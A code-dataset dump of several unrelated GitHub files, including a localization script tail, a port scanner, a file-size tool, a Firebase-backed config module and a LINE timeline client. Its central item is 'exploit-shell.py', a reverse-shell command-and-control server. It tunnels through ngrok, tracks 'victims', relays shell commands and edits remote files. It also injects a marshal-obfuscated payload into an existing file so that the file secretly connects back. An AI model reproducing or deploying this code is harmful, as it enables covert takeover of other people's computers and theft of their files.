[fwrite.write('\t<string name="{key}">{lang}</string>\n'.format(key=row_key, lang=row_values[idx].value)) for idx, fwrite in enumerate(allwrites)]
[fwrite.close() for fwrite in allwrites]
# =========================================================================
# +++++++ Standard boilerplate to call the main() function to begin +++++++
# =========================================================================
parser = argparse.ArgumentParser(description="Locatization commands")
parser.add_argument("-p", help="Specify Platform (iOS, Android)", dest="platform", type=str, required=True)
parser.add_argument("-i", help="Input source, CSV file path", dest="input", type=str, required=True)
parser.add_argument("-o", help="Generated output path for localizable files", dest="output", type=str, required=True)
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
args = parser.parse_args()
# Setup logging
if args.verbose:
loglevel = logging.DEBUG
else:
loglevel = logging.INFO
main(args, loglevel)
``` |
{
"source": "JOKER-7X/HackerMode",
"score": 2
} |
#### File: base/bin/exploit-shell.py
```python
exit("Permission Error: github.com bloked the tool")
import os
import sys
import cmd
import time
import socket
import tempfile
import requests
import threading
print_sys = print
from rich import print
from typing import Optional, Any, Tuple, List
TOOLS_PATH = os.path.join(__file__.rsplit('/', maxsplit=2)[0], 'tools/exploit-shell')
with open(os.path.join(TOOLS_PATH, 'payload.py')) as file:
PAYLOAD = file.read()
while ' ':
check_platform_name = os.popen('lsb_release -i').read().lower()
if 'ubuntu' in check_platform_name:
os.system(r'gnome-terminal -e "bash -c \"ngrok tcp 4444; exec bash\""')
time.sleep(1)
try:
req = requests.get('http://localhost:4040/api/tunnels').json()['tunnels'][0]
break
except requests.exceptions.ConnectionError:
input('\n# please open a tcp port on ngrok\n and click [Enter] ')
HEADER: int = 64
PAYLOAD_SERVER: str = req['public_url'].replace('tcp://', '').split(':')[0]
PAYLOAD_PORT: int = req['public_url'].split(':')[2]
SERVER, PORT = req['config']['addr'].split(':')
ADDR: Tuple[str, int] = (SERVER, int(PORT))
FORMAT: str = 'utf-8'
DISCONNECT_MESSAGE: str = "!DISCONNECT"
server: object = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind(ADDR)
except OSError:
exit("# Address already in use")
clients = set()
clients_lock = threading.Lock()
class BaseShell(cmd.Cmd):
def __init__(self, *args, **kwargs):
sys.stdout.write("\r")
super(BaseShell, self).__init__(*args, **kwargs)
def cmdloop(self, conn, addr, intro: Optional[Any] = ...) -> None:
self.conn: object = conn
self.addr: int = addr
self.prompt = f"[{self.conn.getsockname()}]~$ "
super(BaseShell, self).cmdloop(intro=intro)
def default(self, line: str) -> ...:
self.send(self.conn, line)
data = self.read_str()
if data:
print_sys(data)
def emptyline(self):
"""Called when an empty line is entered in response to the prompt.
If this method is not overridden, it repeats the last nonempty
command entered.
"""
return None
def completenames(self, text: str, *ignored) -> List[str]:
packages: List[str] = super(
BaseShell, self
).completenames(text, *ignored)
packages += [
# add linux commands to shell
a for a in os.listdir(os.environ['SHELL'].rsplit('/', maxsplit=1)[0])
if a.startswith(text)
]
return list(set(packages))
def do_quit(self, arg: str) -> bool:
self.send(self.conn, DISCONNECT_MESSAGE)
self.conn.close()
self.cmdloop_status = False
print(f"# Server is listening on {socket.gethostbyname(PAYLOAD_SERVER)}")
return True
def do_clear(self, arg: str) -> ...:
os.system('clear')
def do_nano(self, arg: str):
self.send(
self.conn,
f"python3 -c \"data = 'x = open(\\'{arg}\\',\\'r\\');print (x.read());x.close()';exec('try:\\n \'+data+\'\\nexcept:pass')\""
)
with open(temp_file := os.path.join(tempfile.gettempdir(), arg), 'w') as file:
file.write(self.read_str())
os.system(f'nano {temp_file}')
with open(temp_file, 'r') as file:
self.send(self.conn, f'echo "{file.read()}" > {arg}')
def do_victims(self, arg: str) -> ...:
print(clients)
def do_session(self, arg: str) -> ...:
if arg.strip().isdigit() and int(arg) in range(0, len(clients)):
self.conn: object = list(clients)[int(arg)]
self.prompt = f"[{self.conn.getsockname()}]~$ "
else:
print('# [red]Session not found![/red]')
class ShellServer(BaseShell):
cmdloop_status: bool = False
def send(self, client, msg):
# to send commands to the client.
message: str = msg.encode(FORMAT)
msg_length: int = len(message)
send_length: bytes = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
try:
client.send(send_length)
client.send(message)
except BrokenPipeError:
print('# Session Status is [red]offline[/red]!')
def read_byets(self) -> bytes:
msg_length = self.conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
return self.conn.recv(msg_length)
return b''
def read_str(self) -> str:
msg_length = self.conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
return self.conn.recv(msg_length).decode(FORMAT)
return ''
def handle_client(self, conn, addr):
if not self.cmdloop_status:
print(f"# new connection...")
print_sys(f"# {addr} connected.\n")
self.cmdloop_status = True
self.cmdloop(conn, addr)
def create_payload(self):
def marshal(code):
import marshal as m
return f'import marshal as m\nexec(m.loads({m.dumps(compile(code,"<String>","exec"))}))'
if len(sys.argv) > 1:
file = sys.argv[1]
if os.path.isfile(file):
with open(file, 'r') as file_r:
content = file_r.read()
with open(file, 'w') as f:
_payload = PAYLOAD.format(injection=True, port=PAYLOAD_PORT, host=f'"{PAYLOAD_SERVER}"')
_payload = marshal(_payload)
if not _payload in content:
f.write(_payload+f'\n{content}')
else:
f.write(content)
else:
print(f"# file: {file} not found!")
exit(-1)
else:
with open('payload.py', 'w') as f:
f.write(marshal(PAYLOAD.format(injection=False, port=PAYLOAD_PORT, host=f'"{PAYLOAD_SERVER}"')))
def start(self):
server.listen()
print(f"# Server is listening on {socket.gethostbyname(PAYLOAD_SERVER)}")
while True:
conn, addr = server.accept()
with clients_lock:
clients.add(conn)
thread = threading.Thread(target=self.handle_client, args=(conn, addr))
thread.start()
if __name__ == '__main__':
Server = ShellServer()
try:
Server.create_payload()
Server.start()
except KeyboardInterrupt:
print("# Server [red]stoped[/red]!")
```
#### File: base/bin/scan.py
```python
from N4Tools.Design import Text,Square,ThreadAnimation,Animation,AnimationTools
import requests as req
import socket,os,time,sys
from threading import Thread as u
A = Animation()
class MA:
def CustomAnimation(min=0,max=5639,**kwargs):
yield A.Prograsse(min=min,max=max,prograsse=['│','\033[1;36m█','\033[1;34m▒','│'],text='Scanning',**kwargs)[0]+f'\033[1;37m({round(min*100/max,1)}/100.0) '
class Main(MA):
ips=[]
def __init__(self):
try:
self.Sq = Square()
self.Sq.color = '[$LCYAN]'
self.T = Text()
eip = req.get('https://api.ipify.org').text
self.ips.append(eip+'+eip')
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
iip = s.getsockname()[0]
self.ips.append(iip+'+iip')
self.open_ports1 = []
self.open_ports1.sort()
self.open_ports2 = []
self.open_ports2.sort()
self.ports=set(list(range(1,6535)) + [8080,7547,6666,8888,7777])
self.mw=os.get_terminal_size().columns
except socket.gaierror:
exit()
except socket.error:
print('\033[1;31m[-] Check your internet connection..!\033[0m')
exit()
except KeyboardInterrupt:
exit()
b='''
_____ _--_
/ ___/_________ _____ .' '.
\__ \/ ___/ __ `/ __ \ |\033[1;30m((0)) \033[1;35m|
___/ / /__/ /_/ / / / / | |
/____/\___/\__,_/_/ /_/ '. .'
|""|
'''
print('\033[0;32m',b,'\033[0m')
def serv(self,p):
try:
x=socket.getservbyport(p)
except socket.error:
x='Unknown'
return x
def display(self,i):
i,a=i.split('+')
myl=self.open_ports1 if a=='eip' else self.open_ports2
fu = '''
port Service Status
[$LCYAN]═══════════════════════════════'''
Ip = f'\n\n[$LYELLOW][{i}]'
if not len(myl):
fu+='\n[$LRED] No Service Is Runing\b'
else:
for p in myl:
fu+=f'\n[$LBLUE] {str(p).ljust(4)} {self.serv(p).rjust(8)} {"Open".rjust(7)} '
box_info=self.Sq.base(fu[1:-1])
output = self.T.CentreAlignPro([Ip,box_info])
for x in output.split('\n'):
print("\t"+x)
@ThreadAnimation(Animation=MA.CustomAnimation)
def scan(Thread,self):
p=0
for ip in self.ips:
i,a=ip.split('+')
myl=self.open_ports1 if a=='eip' else self.open_ports2
for port in self.ports:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.1)
if s.connect_ex((i,port))==0:
myl.append(port)
Thread.set_kwargs(min=p+1, max=6539*2)
p+=1
Thread.kill()
def d(self):
for ip in self.ips:
self.display(ip)
def runs(self):
p1=u(target=self.scan,args=())
p1.start()
p1.join()
s1=u(target=self.d,args=())
s1.start()
if __name__ == '__main__':
Main().runs()
```
#### File: base/bin/size.py
```python
import os
size=os.path
import sys
from N4Tools.Design import ThreadAnimation,AnimationTools,Animation
class Size:
def __init__(self,namefile):
self.namefile=namefile
def sizenumFile(self):
return[os.path.getsize(self.namefile),self.namefile]
def sizenumDir(self):
if os.path.isfile(self.namefile):return self.sizenumFile()
elif os.path.isdir(self.namefile):
s=0
for d,i,r in os.walk(self.namefile):
for n in r:s+=os.path.getsize(os.path.join(d,n))
return[s,self.namefile]
def GetSize(self):
F=self.sizenumDir()
s=F[0]
G=s/1024
S='kB'
if G>1024:
G=G/1024
S='MB'
if G>1024:
G=G/1024
S='GB'
G=str(G).split('.')
return f'{F[1]} : \033[94m{G[0]}.{G[1][0:2]} {S}'
text_anim = AnimationTools.set_text_anim('Calculating the size...')
AN = Animation()
kwargs = (lambda **kwargs:kwargs)(text=text_anim)
@ThreadAnimation(Animation=AN.Loading,kwargs=kwargs)
def App(Thread):
out=[]
for p in sys.argv[1:]:
try:
out.append(f"\033[93m{Size(p).GetSize()}\033[0m")
except:out.append(f"[Errno 2] No such file or directory: '{os.path.join('/',*__file__.split('/')[:-1],p)}")
Thread.kill()
print('\n'.join(out))
App()
```
#### File: HackerMode/base/system.py
```python
import os
import sys
import json
import marshal
import pathlib
from typing import List
sys.path.append('/'.join(os.path.abspath(__file__).split('/')[:-1]))
class System:
TOOL_NAME: str = 'HackerMode'
BASE_PATH: str = pathlib.Path(os.path.abspath(__file__)).parent
def __init__(self):
self.HACKERMODE_PACKAGES = self.HACKERMODE_PACKAGES()
@property
def BIN_PATH(self) -> str:
return ''.join(sys.executable.split('bin')[:-1]) + 'bin'
@property
def TOOL_PATH(self) -> str:
'''To get the tool path'''
ToolPath = os.path.join(os.environ['HOME'],'.HackerMode')
if not os.path.isdir(ToolPath):
os.mkdir(ToolPath)
return ToolPath
@property
def PLATFORME(self) -> str:
'''To get the platform name'''
if sys.platform in ('win32', 'cygwin'):
return 'win'
elif sys.platform == 'darwin':
return 'macosx'
elif 'PWD' in os.environ and 'com.termux' in os.environ['PWD']:
return 'termux'
elif sys.platform.startswith('linux') or sys.platform.startswith('freebsd'):
return 'linux'
return 'unknown'
@property
def SYSTEM_PACKAGES(self) -> str:
'''To gat all files that is in [/usr/bin] directory'''
return os.listdir(self.BIN_PATH)
def HACKERMODE_PACKAGES(self) -> List[str]:
HackerModePackages = lambda path: [
a for a in os.listdir(
os.path.abspath(os.path.join(self.BASE_PATH,path)))
]
packages: List[str] = []
for file_name in HackerModePackages('bin'):
for ext in ['.c','.py','.sh','.dart','.java','.php','.js','.pyc','.cpp']:
if file_name.endswith(ext):
packages.append(file_name[0:-len(ext)])
for tool_name in HackerModePackages('tools'):
if tool_name not in packages:
packages.append(tool_name)
return list(set(packages))
System = System()
class DataBase:
config = {
"apiKey": "<KEY>",
"authDomain": "hackermode-c542d.firebaseapp.com",
"databaseURL": "https://hackermode-c542d.firebaseapp.com",
"storageBucket": "hackermode-c542d.appspot.com"
}
def __init__(self):
import pyrebase, requests
self.requests = requests
self.firebase = pyrebase.initialize_app(self.config)
self.auth = self.firebase.auth()
def sign_in(self,email,password):
try:
user = self.auth.sign_in_with_email_and_password(email,password)
return {
'status_code':200,
'data':user,
}
except self.requests.exceptions.HTTPError as e:
return {
'status_code':400,
'data':json.loads(e.strerror)
}
def sign_up(self,email,password,repeat_password):
if password != repeat_password:
return {
'status_code': 400,
'data': {
'error':{
'message':'PASSWORD_ERROR'
}
}
}
try:
user = self.auth.create_user_with_email_and_password(email,password)
return {
'status_code':200,
'data':user,
}
except self.requests.exceptions.HTTPError as e:
return {
'status_code':400,
'data':json.loads(e.strerror)
}
def send_email_verification(self,token):
if (data:=self.auth.get_account_info(token)).get('users')[0].get('emailVerified'):
return {
'status_code':200,
'data':data
}
try:
self.auth.send_email_verification(token)
return {
'status_code':200,
'data':self.auth.get_account_info(token)
}
except self.requests.exceptions.HTTPError as e:
return {
'status_code': 400,
'data': json.loads(e.strerror)
}
``` |
{
"source": "jokeralish/Linetheme",
"score": 3
} |
#### File: Linetheme/LineTimeline/client.py
```python
import requests
import json
import lxml.html
class LineTimeline:
host = "https://timeline.line.me/api/"
headers = {
"Host": "timeline.line.me",
"Connection": "keep-alive",
"Accept": "application/json, text/plain, */*",
"X-Timeline-WebVersion": "1.10.2",
"X-Line-AcceptLanguage": "ja",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
"Origin": "https://timeline.line.me",
"Content-Type": "application/json;charset=UTF-8",
"Referer": "https://timeline.line.me/",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "ja,en-US;q=0.9,en;q=0.8",
"Cookie": ""
}
homeId = ""
name = ""
def __init__(self, token):
self.headers["Cookie"] = "lwtl={}".format(token)
try:
r = requests.get(url="https://timeline.line.me/", headers=self.headers)
r = lxml.html.fromstring(r.text)
home = r.xpath("//a")
name = r.xpath("//span")
for x in home:
try:
if '83' == x.attrib["data-reactid"]:
self.homeId = x.attrib["href"].replace("/user/","")
except:
pass
for x in name:
try:
if '79' == x.attrib["data-reactid"]:
self.name = x.text
except:
pass
if not self.name or not self.homeId:
print("Loggin Failed")
else:
print("Loggin Success")
print("Name : {}\nhomeId : {}".format(self.name, self.homeId))
except Exception as e:
print(e)
def getFeed(self, postLimit=10, commentLimit=2, likeLimit=20):
data = {"postLimit": postLimit, "commentLimit": commentLimit, "likeLimit": likeLimit}
r = requests.get(url=self.host + "feed/list.json", headers=self.headers, params=data)
return r.json()
def createPost(self, viewType, text):
if viewType == 0:
viewType = "NONE"
elif viewType == 1:
viewType = "FRIEND"
elif viewType == 2:
viewType = "ALL"
json = {"postInfo": {"readPermission": {"type": viewType,}},"contents": {"text": text,"stickers": [],"media": [],"contentsStyle": {"textStyle": {},"stickerStyle": {}}}}
r = requests.post(url=self.host + "post/create.json", headers=self.headers, json=json)
return r.json()
def deletePost(self, postId):
json = {"postId": postId}
r = requests.post(url=self.host + "post/delete.json", headers=self.headers, json=json)
return r.json()
def likePost(self, postId, likeType=1001):
json = {"contentId": postId, "likeType": "1001"}
r = requests.post(url=self.host + "like/create.json", headers=self.headers, json=json)
return r.json()
def unlikePost(self, postId):
json = {"contentId": postId}
r = requests.post(url=self.host + "like/cancel.json", headers=self.headers, json=json)
return r.json()
def createComment(self, postId, text=None):
if text == None:
text = ""
json = {"contentId": postId, "commentText": text}
r = requests.post(url=self.host + "comment/create.json", headers=self.headers, json=json)
return r.json()
def deleteComment(self, postId, commentId):
json = {"postId": postId, "commentId": commentId}
r = requests.post(url=self.host + "comment/delete.json", headers=self.headers, json=json)
return r.json()
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.